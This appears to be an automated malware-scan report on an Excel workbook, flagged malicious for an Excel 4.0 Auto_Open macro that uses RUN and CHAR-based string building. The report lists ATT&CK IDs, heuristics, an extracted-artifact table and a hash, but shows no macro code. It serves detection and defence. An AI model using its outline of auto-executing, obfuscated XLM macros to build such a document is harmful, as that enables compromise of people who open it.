Verdict: MALICIOUS
Risk Score: 140

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically triggering an Auto_Open event. Critical heuristics indicate the use of dangerous formula APIs, including the RUN function, suggesting an attempt to execute arbitrary code. The macro attempts to construct a string using CHAR and arithmetic operations, likely to form a command or payload.
Heuristics (3)
- [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME: Excel 4.0 Auto_Open defined name. oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- [critical] OLE_XLM_DANGEROUS_FN: XLM Auto_Open with dangerous formula APIs. The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- [medium] OLE_XLM_AUTOOPEN: Excel 4.0 (XLM) macro sheet present. The workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 129349 bytes |

SHA-256: 2dc0d98bec8d73bfc6b8c14a230be3f6086a007b417c048af22e32023fa457ec
Preview script: first 1,000 lines of the extracted script.